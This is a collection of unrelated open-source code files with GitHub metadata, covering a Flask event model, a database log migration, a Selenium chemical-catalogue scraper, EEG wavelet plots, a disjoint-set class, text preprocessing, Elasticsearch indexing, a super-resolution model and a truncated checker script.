"updated_at": row["users.updated_at"]
}
one_event.creator = user.User(user_data)
return one_event
@classmethod # get by the ID, appending the messages into empty list
def get_one(cls, data):
query = """SELECT * FROM events
LEFT JOIN messages
ON events.id = messages.event_id
WHERE events.id = %(id)s;"""
results = connectToMySQL(cls.db).query_db(query, data)
event = cls(results[0])
event.guests = user.User.get_event_guests({"event_id": event.id})
event.messages = []
for row in results:
message_row = {
"id": row['messages.id'],
"content": row['content'],
"user_id": row['messages.user_id'],
"event_id": row['event_id'],
"created_at": row['messages.created_at'],
"updated_at": row['messages.updated_at']
}
one_message = message.Message(message_row)
one_message.creator = user.User.get_from_id(
{"id": row["messages.user_id"]}) # grabbing events user_id
event.messages.append(one_message)
return event
@classmethod # upate function
def update(cls, data):
query = """UPDATE events
SET event= %(event)s,
description= %(description)s,
activities= %(activities)s,
start_date= %(start_date)s,
end_date= %(end_date)s,
location= %(location)s,
updated_at= NOW()
WHERE id= %(id)s;"""
return connectToMySQL(cls.db).query_db(query, data)
@classmethod # delete function
def destroy(cls, data):
query = """DELETE FROM events
WHERE id = %(id)s;"""
return connectToMySQL(cls.db).query_db(query, data)
@staticmethod # validating event details
def validate_event(event):
is_valid = True
if len(event['event']) < 2:
is_valid = False
flash("The event name is too short", "event")
if len(event['activities']) < 2:
is_valid = False
flash("The activities is too short", "event")
if len(event['description']) < 2:
is_valid = False
flash("The description is too short", "event")
        if event['start_date'] == "":
            is_valid = False
            flash("Missing a start date", "event")
        if event['end_date'] == "":
            is_valid = False
            flash("Missing an end date", "event")
if len(event['location']) < 2:
is_valid = False
flash("Location is too short", "event")
return is_valid
| rchuu/plannendar | flask_app/models/event.py | event.py | py | 5,351 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask_app.config.mysqlconnection.connectToMySQL",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "flask_app.config.mysqlconnection.connectToMySQL",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "flask_app.config.mysqlconnection.connectToMySQL",... |
12410410025 | """
Update existing "embargo_approved_no_user" logs to link to registered project instead
of the registration.
"""
from copy import deepcopy
import logging
import sys
from modularodm import Q
from framework.transactions.context import TokuTransaction
from website.models import Node, NodeLog
from website.app import init_app
from scripts import utils as script_utils
logger = logging.getLogger(__name__)
def main():
targets = get_targets()
fix_embargo_approved_logs(targets)
def get_targets():
return NodeLog.find(Q('action', 'eq', NodeLog.EMBARGO_APPROVED) & Q('params.user', 'eq', None))
def fix_embargo_approved_logs(targets):
count = 0
for log in targets:
node_id = log.params['node']
node = Node.load(node_id)
if node.is_registration:
original_params = deepcopy(log.params)
log.params['node'] = node.registered_from_id
log.params['registration'] = node._id
logger.info('Updating params of log {} from {} to {}'.format(log._id, original_params, log.params))
log.save()
count += 1
logger.info('{} logs migrated'.format(count))
if __name__ == '__main__':
dry = '--dry' in sys.argv
if not dry:
script_utils.add_file_logger(logger, __file__)
init_app(routes=False, set_backends=True)
with TokuTransaction():
main()
if dry:
raise Exception('Dry Run -- Aborting Transaction')
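# Editor's note (added comment, not part of the original script): passing "--dry" on
# the command line prints the would-be changes and then raises inside the
# TokuTransaction context so the migration is rolled back; omit the flag to commit it.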
| karenhanson/osf.io_rmap_integration_old | scripts/fix_embargo_approved_logs.py | fix_embargo_approved_logs.py | py | 1,458 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "website.models.NodeLog.find",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "website.models.NodeLog",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "... |
35217860162 | from itertools import product
import sys
from bs4 import BeautifulSoup
from selenium import webdriver
import time
import json
import random
sys.path.append('../..')
from lib import excelUtils
from lib import httpUtils
from lib import textUtil
from lib.htmlEleUtils import getNodeText
from lib.htmlEleUtils import getInnerHtml
products = []
header=['link','type','Product Name']
def addHeader(title):
if title not in header and len(title) > 0:
header.append(title)
chrome_options = webdriver.ChromeOptions()
# chrome_options.add_argument('--headless')
chrome_options.add_argument('--disable-gpu')
chrome_options.add_argument("window-size=1024,768")
chrome_options.add_argument("--proxy-server=http://127.0.0.1:33210")
# chrome_options.add_argument("--no-sandbox")
browser = webdriver.Chrome(chrome_options=chrome_options)
def getProductInfo(url):
print(str(len(products)) + ":" + url)
browser.get(url)
sope= BeautifulSoup(browser.page_source, "html.parser")
pInfo = {
"link": url,
}
nameArea = sope.find("div", attrs={"class":"col-lg-12 col-md-12 col-sm-12 col-xs-12 follow-box-title"})
pInfo["Product Name"] = getNodeText(nameArea)
specs = sope.find_all("div", attrs={"class":"prd-des-lis"})
for spec in specs:
titleArea = spec.find("div", attrs={"class":"col-lg-4 col-md-4 col-sm-12 col-xs-12 prod-categorty"})
valArea = spec.find("div", attrs={"class":"col-lg-8 col-md-8 col-sm-12 col-xs-12 clearfix prod-categorty prod-category-back"})
valArea2 = spec.find("div", attrs={"class":"col-lg-8 col-md-8 col-sm-12 col-xs-12 clearfix prod-categorty prod-category-back synonymWrapper"})
if titleArea!=None:
title = getNodeText(titleArea)
value = getNodeText(valArea)
if len(value) == 0:
value = getNodeText(valArea2)
addHeader(title)
pInfo[title] = value
print(pInfo)
products.append(pInfo.copy())
def getProductType(url):
browser.get(url)
sope= BeautifulSoup(browser.page_source, "html.parser")
trs = sope.find_all("div", attrs={"class":"single-details"})
for tr in trs:
pLink = tr.find("a")
if pLink != None:
linkSrc = pLink["href"]
getProductInfo(linkSrc)
# getProductInfo("https://www.lobachemie.com/Alcohols-0059A/tertBUTANOL-CASNO-75-65-0.aspx", 'Alcohols')
for pIndex in range(1, 7):
getProductType("https://www.parchem.com/Solvents-chemicals-supplier-distributor~"+str(pIndex)+".aspx")
# getProductType("https://www.parchem.com/Solvents-chemicals-supplier-distributor~1.aspx")
excelUtils.generateExcel('parchem.xlsx', products, header) | Just-Doing/python-caiji | src/work/20230205/parchem.py | parchem.py | py | 2,568 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "sys.path.append",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "selenium.webdriver.ChromeOptions",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "selenium... |
7416408824 | import pywt
import numpy as np
from scipy import stats
import matplotlib.pyplot as plt
plt.style.use("resources/figstyle.mplstyle")
FIG_WIDTH = 2.3 * 7.16
# Gaussian fitting utils
from scipy import optimize
def fit_generalized_gaussian(x):
μ0 = x.mean()
σ0 = x.std()
β0 = 2
res = optimize.minimize(
neg_gg_likelihood,
(μ0, σ0, β0),
args=(x,),
bounds=[(-np.inf, np.inf), (1e-2, np.inf), (1e-2, np.inf)],
)
return res.x
def neg_gg_likelihood(θ, x):
μ, σ, β = θ
return -stats.gennorm.logpdf(x, loc=μ, scale=σ, beta=β).sum()
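# Editor's note: quick sanity check for the fitter (added by the editor, not part of
# the original script). Sampling from a known generalized Gaussian should roughly
# recover the (mu, scale, beta) parameters:
#   sample = stats.gennorm.rvs(beta=1.5, loc=0.0, scale=2.0, size=5000)
#   print(fit_generalized_gaussian(sample))   # expect approximately (0.0, 2.0, 1.5)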
# Load data and normalize
eeg = np.load("resources/data/eeg-denoise-net/EEG_all_epochs.npy")
eog = np.load("resources/data/eeg-denoise-net/EOG_all_epochs.npy")
emg = np.load("resources/data/eeg-denoise-net/EMG_all_epochs.npy")
n_eeg = (eeg - eeg.mean(axis=-1).reshape(-1, 1)) / eeg.std(axis=-1).reshape(-1, 1)
n_eog = (eog - eog.mean(axis=-1).reshape(-1, 1)) / eog.std(axis=-1).reshape(-1, 1)
n_emg = (emg - emg.mean(axis=-1).reshape(-1, 1)) / emg.std(axis=-1).reshape(-1, 1)
# Wavelet transform
max_levels = 4
eeg_coeffs = pywt.wavedec(
n_eeg, "sym5", level=max_levels, axis=-1, mode="periodization"
)
eog_coeffs = pywt.wavedec(
n_eog, "sym5", level=max_levels, axis=-1, mode="periodization"
)
emg_coeffs = pywt.wavedec(
n_emg, "sym5", level=max_levels, axis=-1, mode="periodization"
)
level_names = [f"Level $c_{n}$" for n in range(len(eeg_coeffs), 0, -1)]
# Prepare figure
num_levels = 4
xlim = (-8, 8)
fig, axes = plt.subplots(
nrows=num_levels,
sharex=True,
ncols=3,
figsize=(FIG_WIDTH, FIG_WIDTH * 0.3),
)
num_bins = 201
bin_range = (-10, 10)
n = 0
for cs_eeg, cs_eog, cs_emg, name in zip(
eeg_coeffs[:num_levels],
eog_coeffs[:num_levels],
emg_coeffs[:num_levels],
level_names[:num_levels],
):
_, bins, _ = axes[n, 0].hist(
cs_eeg.reshape(-1),
fc="#2D9CDB",
bins=num_bins,
range=bin_range,
density=True,
alpha=0.7,
)
μ, α, β = fit_generalized_gaussian(cs_eeg.reshape(-1))
axes[n, 0].plot(
bins,
stats.gennorm.pdf(bins, loc=μ, scale=α, beta=β),
c="k",
ls="--",
lw=1.5,
label=f"α = {α:.2f}\nβ = {β:.2f}",
)
axes[n, 0].legend(loc="upper right", bbox_to_anchor=(1.03, 1.1))
if n == 0:
μ, α, β = fit_generalized_gaussian(cs_eog.reshape(-1))
axes[n, 1].plot(
bins,
stats.gennorm.pdf(bins, loc=μ, scale=α, beta=β),
c="k",
ls="--",
lw=1,
alpha=0.8,
label=f"α = {α:.2f}\nβ = {β:.2f}",
)
axes[n, 1].legend(loc="upper right", bbox_to_anchor=(1.03, 1.1))
μ, α, β = fit_generalized_gaussian(cs_emg.reshape(-1))
axes[n, 2].plot(
bins,
stats.gennorm.pdf(bins, loc=μ, scale=α, beta=β),
c="k",
ls="--",
lw=1,
alpha=0.8 if n == 2 else 1,
label=f"α = {α:.2f}\nβ = {β:.2f}",
)
axes[n, 2].legend(loc="upper right", bbox_to_anchor=(1.03, 1.1))
axes[n, 2].hist(
cs_emg.reshape(-1),
fc="#2D9CDB",
bins=num_bins,
range=bin_range,
density=True,
alpha=0.7,
)
axes[n, 1].hist(
cs_eog.reshape(-1),
fc="#2D9CDB",
bins=num_bins,
range=bin_range,
density=True,
alpha=0.7,
)
axes[n, 0].set_ylabel(name)
axes[n, 0].set_yticks([])
axes[n, 1].set_yticks([])
axes[n, 2].set_yticks([])
n += 1
axes[0, 0].set_title("EEG", fontsize=14)
axes[0, 1].set_title("EOG", fontsize=14)
axes[0, 2].set_title("EMG", fontsize=14)
axes[0, 0].set_xticks([-5, 0, 5])
axes[0, 1].set_xticks([-5, 0, 5])
axes[0, 2].set_xticks([-5, 0, 5])
axes[0, 0].set_xlim(*xlim)
axes[0, 1].set_xlim(*xlim)
axes[0, 2].set_xlim(*xlim)
axes[-1, 0].set_xlabel("Coefficient value", labelpad=-2)
axes[-1, 1].set_xlabel("Coefficient value", labelpad=-2)
axes[-1, 2].set_xlabel("Coefficient value", labelpad=-2)
fig.subplots_adjust(wspace=0.04, hspace=0.1)
fig.savefig("./output/acha_fig2_coeff_distributions.pdf")
print("Figure saved to `./output/acha_fig2_coeff_distributions.pdf`")
| mattbit/wavelet-wqn-acha | acha_scripts/02_figure_2__coeff_distributions.py | 02_figure_2__coeff_distributions.py | py | 4,260 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "matplotlib.pyplot.style.use",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.style",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 7,
"usage_type": "name"
},
{
"api_name"... |
10246834959 | import os
import argparse
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Some hyperparameters')
parser.add_argument('--epochs', type=int, default=200)
parser.add_argument('--frac', type=float, default=0.1)
parser.add_argument('--iid', type=bool, default=False)
parser.add_argument('--dataset', type=str, default='fashion-mnist')
parser.add_argument('--model', type=str, default='cnn')
args = parser.parse_args()
rootpath = './log'
# full participation
full_acc = []
full_accfile = open(rootpath + '/accfile_fed_{}_{}_{}_C{}_iid{}_{}.dat'.
format(args.dataset, args.model, args.epochs, 1.0, args.iid, 'full'), 'r')
for acc in full_accfile.readlines():
full_acc.append(float(acc))
full_accfile.close()
# random sampling
rand_acc = []
rand_accfile = open(rootpath + '/accfile_fed_{}_{}_{}_C{}_iid{}_{}.dat'.
format(args.dataset, args.model, args.epochs, args.frac, args.iid, 'full'), 'r')
for acc in rand_accfile.readlines():
rand_acc.append(float(acc))
rand_accfile.close()
# power-of-choice
power_acc = []
power_accfile = open(rootpath + '/accfile_fed_{}_{}_{}_C{}_iid{}_{}.dat'.
format(args.dataset, args.model, args.epochs, 1.0, args.iid, 'power-of-choice'), 'r')
for acc in power_accfile.readlines():
power_acc.append(float(acc))
power_accfile.close()
# ideal
ideal_acc = []
ideal_accfile = open(rootpath + '/accfile_fed_{}_{}_{}_C{}_iid{}_{}.dat'.
format(args.dataset, args.model, args.epochs, 0.3, args.iid, 'ideal'), 'r')
for acc in ideal_accfile.readlines():
ideal_acc.append(float(acc))
ideal_accfile.close()
# # practical
# practical_acc = []
# prac_accfile = open(rootpath + '/accfile_fed_{}_{}_{}_C{}_iid{}_{}.dat'.
# format(args.dataset, args.model, args.epochs, 1.0, args.iid, 'practical'), 'r')
# for acc in prac_accfile.readlines():
# practical_acc.append(float(acc))
# prac_accfile.close()
# # divfl
# divfl_acc = []
# divfl_accfile = open(rootpath + '/accfile_fed_{}_{}_{}_C{}_iid{}_{}.dat'.
# format(args.dataset, args.model, args.epochs, 1.0, args.iid, 'divfl'), 'r')
# for acc in divfl_accfile.readlines():
# divfl_acc.append(float(acc))
# divfl_accfile.close()
plt.figure()
plt.plot(range(len(full_acc)), full_acc, linestyle='--', label='Full')
plt.plot(range(len(rand_acc)), rand_acc, label='Random')
plt.plot(range(len(power_acc)), power_acc, label='Power-of-choice')
# plt.plot(range(len(divfl_acc)), divfl_acc, label='DivFL')
plt.plot(range(len(ideal_acc)), ideal_acc, label='Ours (ideal)')
# plt.plot(range(len(practical_acc)), practical_acc, label='Ours (practical)')
plt.legend()
plt.xlabel('Epoch')
plt.ylabel('Test Accuracy')
plt.savefig(rootpath + '/fed_{}_{}_{}_iid{}_acc.png'.format(args.dataset, args.model, args.epochs, args.iid)) | jinwoolim8180/fl-sparse-masking | accuracy.py | accuracy.py | py | 3,163 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "matplotlib.use",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "argparse.ArgumentParser",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.figure",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "matplot... |
19074906476 | from collections.abc import Iterable  # Iterable lives in collections.abc (required on Python 3.10+); the unused Iterator import was dropped
#global set_num
#set_num = 0
class Disjoint_set(Iterable):
def __init__(self, element=None):
self.head = element
self.tail = element
element.set = self
#global set_num
#set_num += 1
def add_element(self, element):
if self.head != None:
self.tail.next = element
else:
self.head = element
self.tail = element
element.set = self
def __str__(self):
if not self.is_empty():
return str([self.head.label, self.tail.label])
else:
return 'empty set'
def get_elements(self):
if not self.is_empty():
elements_ls = [self.head.label]
ele = self.head
while ele.next:
elements_ls.append(ele.next.label)
ele = ele.next
return elements_ls
else:
return []
def get_len(self):
if not self.is_empty():
set_len = 1
ele = self.head
while ele.next:
set_len+=1
ele = ele.next
return set_len
else:
return 0
def is_empty(self):
return self.head == None
def __iter__(self):
if not self.head:
return
ele = self.head
yield ele
while ele.next:
ele = ele.next
yield ele
class Element():
def __init__ (self, label):
self.set = None
self.next = False
self.label = label
def show_set(self):
return(self.set.get_elements())
def __str__(self):
return str(self.label)
def union(set1, set2):
if set1.get_len() > set2.get_len():
max_set = set1
min_set = set2
else:
min_set = set1
max_set = set2
max_set.tail.next = min_set.head
max_set.tail = min_set.tail
#min_set.tail.next = None
cur = min_set.head
cur.set = max_set
while cur.next:
cur = cur.next
cur.set = max_set
min_set.head = None
min_set.tail = False
#global set_num
#set_num -= 1
return max_set
| LouisYLWang/Algorithms | Clustering_algorithm/Disjoint_set.py | Disjoint_set.py | py | 2,199 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "collections.Iterable",
"line_number": 7,
"usage_type": "name"
}
] |
39804183733 | import os
from celery import Celery
# Set the default Django settings module for the 'celery' program.
# similar to the setup in asgi.py
# os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'prolube76site.settings')
app = Celery('prolube76site')
# Using a string here means the worker doesn't have to serialize
# the configuration object to child processes.
# - namespace='CELERY' means all celery-related configuration keys
# should have a `CELERY_` prefix.
# We also add the Django settings module as a configuration source for Celery.
# This means that you don't have to use multiple configuration files, and can
# instead configure Celery directly from the Django settings; but you can also
# separate them if wanted.
app.config_from_object('django.conf:settings', namespace='CELERY')
# Load task modules from all registered Django apps.
app.autodiscover_tasks()
@app.task(bind=True)
def debug_task(self):
print(f'Request: {self.request!r}')
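# Editor's note (added comment, not part of the original file): because
# autodiscover_tasks() is called above, any installed Django app can expose tasks in
# its own tasks.py module, for example (hypothetical app and task names):
#
#   # someapp/tasks.py
#   from celery import shared_task
#
#   @shared_task
#   def add(x, y):
#       return x + y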
| zjgcainiao/new_place_at_76 | prolube76site/celery.py | celery.py | py | 952 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "celery.Celery",
"line_number": 9,
"usage_type": "call"
}
] |
31566863140 | import sys
import csv
# preprocessing
import gensim
from gensim.utils import simple_preprocess
import re
import nltk
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
# lemmitization
from nltk.stem import WordNetLemmatizer
def pre_processor():
user_input = input('Please enter a dream: ')
data = user_input
# remove punctuatiom
data = re.sub(r'[^\w\s]', '', data)
# lower case
data = data.lower()
# remove numbers
data = re.sub(r'\d+', '', data)
# remove newlines '/n'
data = re.sub('\s+', ' ', data)
# remove non-ASCII characters
data = re.sub(r'[^\x00-\x7f]',r' ',data)
# remove underscores
data = re.sub(r'[_]', '', data)
# remove words less than 3 characters
data = re.sub(r'\b\w{1,2}\b', '', data)
# create stop_words
stop_words = stopwords.words('english')
new_stop_words = ['from', 'subject', 're', 'edu', 'use', 'not', 'would', 'say', 'could', '_', 'be', 'know',
'good', 'go', 'get', 'do', 'done', 'try', 'many', 'some', 'nice', 'thank', 'think', 'see',
'rather', 'easy', 'easily', 'lot', 'lack', 'make', 'want', 'seem', 'run', 'need', 'even',
'right', 'line', 'even', 'also', 'may', 'take', 'come', 'look', 'back', 'start', 'going',
'doing', 'what','whats', 'pron', 'dream', 'and']
stop_words.extend(new_stop_words)
# remove stop words and tokenize
data_words = [i for i in word_tokenize(data.lower()) if i not in stop_words]
# create bigrams
bigram = gensim.models.Phrases(data_words, min_count=5, threshold=100)
bigram_mod = gensim.models.phrases.Phraser(bigram)
data_words_bigrams = bigram_mod[data_words]
# Init the Wordnet Lemmatizer
lemmatizer = WordNetLemmatizer()
data_lemmatized = [lemmatizer.lemmatize(w) for w in data_words_bigrams]
return data_lemmatized
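# Editor's note (added comment, not part of the original file): pre_processor relies on
# NLTK corpora that must be downloaded once before first use, e.g.
#   import nltk
#   nltk.download('stopwords'); nltk.download('punkt'); nltk.download('wordnet')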
| connormeaton/dream_cluster | src/app/SampleTextPreprocessor.py | SampleTextPreprocessor.py | py | 1,906 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "re.sub",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "re.sub",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "re.sub",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "re.sub",
"line_number": 29,
"usage_type"... |
12185526029 | """Inference for 2D US Echocardiography EchoNet dataset."""
import os
import numpy as np
import torch
import torchvision.transforms as transforms
import torch.nn.functional as F
from PIL import Image
from torch.autograd import Variable
import matplotlib.pyplot as plt
from models.unet import UNet
from models.cenet import CE_Net_OCT
from models.fpn import FPN
import glob
class TTTSInference:
"""EchoCardioInference class."""
def __init__(self, model_path: str = None
) -> None:
"""
Args:
model_path:
"""
self.model_path = model_path
self.model = FPN(num_blocks=[2,4,23,3], num_classes=4, back_bone="resnet101")
self.model.load_state_dict(torch.load(self.model_path,
map_location="cpu"))
self.model.eval()
self.transforms = transforms.Compose([
transforms.Resize(size=(448, 448)),
transforms.ToTensor()
])
def get_visual_prediction(self,
image_name,
mask_name):
"""
Args:
image_name:
mask_name:
Returns:
"""
image = Image.open(image_name)
mask = Image.open(mask_name)
size = (448, 448)
img = self.transforms(image).unsqueeze(0)
mask = self.transforms(mask).unsqueeze(0)
pred_mask = self.model(Variable(img))
pred_mask = F.softmax(pred_mask, dim=1)
pred_mask = pred_mask.squeeze(0)
data = pred_mask.cpu().data
full_mask = torch.argmax(data, 0)
plt.imshow(full_mask[:, :])
#pred_mask = transforms.ToPILImage()(data).resize(size)
#data_mask = mask.squeeze(0).cpu().data
#mask = transforms.ToPILImage()(data_mask)
#ig = plt.imshow(pred_mask)
#ii = plt.imshow(mask.squeeze(0).squeeze(0), alpha=0.4)
plt.show()
if __name__ == "__main__":
fet_reg = TTTSInference(model_path="../data/model-fold-0fpa.pt")
fet_reg.get_visual_prediction(image_name="../data/Video001/images/Video001_frame01250.png",
mask_name="../data/Video001/labels/Video001_frame01250.png") | SanoScience/TTTS_CV | src/inference.py | inference.py | py | 2,235 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "models.fpn.FPN",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "torch.load",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "torchvision.transforms.Compose",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "torchvision.... |
69997777065 | from re import split
from typing import Dict, Mapping
from elasticsearch import Elasticsearch
import cbor
import json
from trec_car.read_data import *
class IndexManagement:
def __init__(self):
self.es_cli = Elasticsearch(
timeout=200, max_retries=15, retry_on_timeout=True)
self.es_cli.info()
# use default setting
self.setting = {
"settings": {
"number_of_shards": 5,
"index": {
"similarity": {
"default": {
"type": "BM25",
"b": 0.75,
"k1": 1.2,
}
}
}
}
}
def index_text_data(self, index_name: str, filepath: str) -> None:
""" Indexes data into the elastics search instance.
Args:
index_name: Name of index.
doc_id: Id of the document to be indexed.
doc: Document to be indexed.
"""
batch_size = 5000
f = open(filepath, 'r', encoding='utf-8')
lines = f.readlines()
for i in range(0, len(lines), batch_size):
bulk_data = []
for line in lines[i:i+batch_size]:
doc = line.split('\t')
curr_doc = {"doc_id": doc[0], "body": doc[1].strip()}
json_doc = json.dumps(curr_doc)
_doc = json.loads(json_doc)
bulk_data.append(
{"index": {"_index": index_name,
"_id": _doc.pop("doc_id")}}
)
bulk_data.append(_doc)
self.es_cli.bulk(index=index_name, body=bulk_data, refresh=True)
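    # Editor's note (added comment, not part of the original file): the Elasticsearch
    # bulk body alternates an action line and a source document per record, e.g.
    #   {"index": {"_index": "ms_marco", "_id": "0"}}
    #   {"body": "passage text ..."}
    # which is why two items are appended to bulk_data for every document above.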
def index_cbor_data(self, index_name: str, filepath: str) -> None:
"""[summary]
Args:
index_name (str): [description]
filepath (str): [description]
"""
batch_size = 5000
bulk_data = []
with open(filepath, 'rb') as fp:
for i, para in enumerate(iter_paragraphs(fp)):
para_id = para.para_id
body = [elem.text if isinstance(elem, ParaText)
else elem.anchor_text
for elem in para.bodies]
body = ' '.join(body)
elem = {"doc_id": para_id, "body": body.strip()}
json_elem = json.dumps(elem)
_elem = json.loads(json_elem)
bulk_data.append(
{"index": {"_index": index_name,
"_id": _elem.pop("doc_id")}}
)
bulk_data.append(_elem)
if (i+1) % batch_size == 0:
self.es_cli.bulk(index=index_name,
body=bulk_data, refresh=True)
bulk_data = []
if len(bulk_data) > 0:
self.es_cli.bulk(index=index_name,
body=bulk_data, refresh=True)
def reset_index(self, index_name: str) -> None:
""" Removes instance of elastics search.
Args:
index_name: Name of index.
index_setting: Index setting chosen for the elastics search instance.
"""
if self.es_cli.indices.exists(index_name):
self.es_cli.indices.delete(index=index_name)
# self.es_cli.create(index=index_name)
if __name__ == "__main__":
""" filepath_marco = "D:\data_collection/collection.tsv"
filepath_car = "../data_collection/dedup.articles-paragraphs.cbor"
index_name = 'ms_marco'
index_mng = IndexManagement()
index_mng.reset_index(index_name)
index_mng.index_text_data(index_name, filepath_marco)
index_mng.index_cbor_data(index_name, filepath_car) """
es = Elasticsearch()
print(es.count(index="ms_marco"))
| Hanifff/ConversationalAssistance | index_data.py | index_data.py | py | 3,917 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "elasticsearch.Elasticsearch",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "json.dumps",
"line_number": 46,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 47,
"usage_type": "call"
},
{
"api_name": "json.dumps",
"l... |
19348729652 | from app import app
from flask import request, jsonify, make_response
from api_exception import ApiException
from data.internal_configurations.internal_configurations import InternalConfigurations
@app.errorhandler(ApiException)
def handle_invalid_service(error):
response = jsonify(error.to_dict())
response.status_code = error.status_code
return response
@app.route('/api/internal-configurations', methods=['GET', 'POST', 'PUT'])
def internal_configurations():
query_params = request.args
if request.method == "GET":
internal_configs = InternalConfigurations()
if query_params.get("feature"):
return jsonify(internal_configs.find_by("feature", query_params.get("feature"))), 200
else:
return jsonify(internal_configs.all), 200
elif request.method == "POST":
internal_configs = InternalConfigurations(params=request.get_json())
if internal_configs.save:
return jsonify({"message": "Internal Configuration created."}), 200
else:
return jsonify({"message": "Internal Configuration not created."}), 400
elif request.method == "PUT":
if not query_params.get("feature"):
return jsonify({"missing query `feature`."}), 400
internal_configs = InternalConfigurations(
feature=query_params.get("feature"))
if internal_configs.exists:
try:
if internal_configs.update(request.get_json()):
return jsonify({"message": "Succssefuly upated."}), 200
else:
return jsonify({"message": "Something went wrong while upating."}), 200
except Exception as e:
                raise ApiException(str(e), 500)
else:
return jsonify({"message": "`{}`feature not found.".format(query_params.get("feature"))}), 404
| mbast100/st-joseph-backend-services | routes/internal_configurations.py | internal_configurations.py | py | 1,885 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "flask.jsonify",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "app.app.errorhandler",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "api_exception.ApiException",
"line_number": 7,
"usage_type": "argument"
},
{
"api_name": "app.ap... |
35609489128 | from math import sqrt
import torch
from torch import nn
class FSRCNN(nn.Module):
"""
Args:
upscale_factor (int): Image magnification factor.
"""
def __init__(self, upscale_factor: int) -> None:
super(FSRCNN, self).__init__()
# Feature extraction layer.
self.feature_extraction = nn.Sequential(
nn.Conv2d(1, 56, (5, 5), (1, 1), (2, 2)),
nn.PReLU(56)
)
# Shrinking layer.
self.shrink = nn.Sequential(
nn.Conv2d(56, 12, (1, 1), (1, 1), (0, 0)),
nn.PReLU(12)
)
# Mapping layer.
self.map = nn.Sequential(
nn.Conv2d(12, 12, (3, 3), (1, 1), (1, 1)),
nn.PReLU(12),
nn.Conv2d(12, 12, (3, 3), (1, 1), (1, 1)),
nn.PReLU(12),
nn.Conv2d(12, 12, (3, 3), (1, 1), (1, 1)),
nn.PReLU(12),
nn.Conv2d(12, 12, (3, 3), (1, 1), (1, 1)),
nn.PReLU(12)
)
# Expanding layer.
self.expand = nn.Sequential(
nn.Conv2d(12, 56, (1, 1), (1, 1), (0, 0)),
nn.PReLU(56)
)
# Deconvolution layer.
self.deconv = nn.ConvTranspose2d(56, 1, (9, 9), (upscale_factor, upscale_factor), (4, 4), (upscale_factor - 1, upscale_factor - 1))
# Initialize model weights.
self._initialize_weights()
def forward(self, x: torch.Tensor) -> torch.Tensor:
return self._forward_impl(x)
# Support torch.script function.
def _forward_impl(self, x: torch.Tensor) -> torch.Tensor:
out = self.feature_extraction(x)
out = self.shrink(out)
out = self.map(out)
out = self.expand(out)
out = self.deconv(out)
return out
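    # Editor's note: minimal shape check (added by the editor, not part of the original
    # file). With upscale_factor=3 and a 1x1x32x32 input, the transposed convolution
    # yields (32-1)*3 - 2*4 + (9-1) + 2 + 1 = 96, i.e.
    #   model = FSRCNN(upscale_factor=3)
    #   print(model(torch.randn(1, 1, 32, 32)).shape)   # torch.Size([1, 1, 96, 96])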
# The filter weight of each layer is a Gaussian distribution with zero mean and standard deviation initialized by random extraction 0.001 (deviation is 0).
def _initialize_weights(self) -> None:
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.normal_(m.weight.data, mean=0.0, std=sqrt(2 / (m.out_channels * m.weight.data[0][0].numel())))
nn.init.zeros_(m.bias.data)
nn.init.normal_(self.deconv.weight.data, mean=0.0, std=0.001)
nn.init.zeros_(self.deconv.bias.data) | gmlwns2000/sharkshark-4k | src/upscale/model/fsrcnn/model.py | model.py | py | 2,315 | python | en | code | 14 | github-code | 36 | [
{
"api_name": "torch.nn.Module",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "torch.nn.Sequential",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_... |
33532112483 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
A script to test if the associations.csv are good.
Typically you would run this file from a command line like this:
ipython3.exe -i -- /deploy/cbmcfs3_runner/scripts/check_associations.py
"""
# Built-in modules #
# Third party modules #
import pandas
from tqdm import tqdm
# First party modules #
from autopaths.auto_paths import AutoPaths
from plumbing.cache import property_cached
from plumbing.databases.access_database import AccessDatabase
# Internal modules #
from cbmcfs3_runner.core.continent import continent
# Constants #
###############################################################################
class AssociationsChecker(object):
keys = ['MapAdminBoundary', 'MapEcoBoundary', 'MapSpecies',
'MapDisturbanceType', 'MapNonForestType']
all_paths = """
/orig/calibration.mdb
/orig/aidb_eu.mdb
/orig/associations.csv
"""
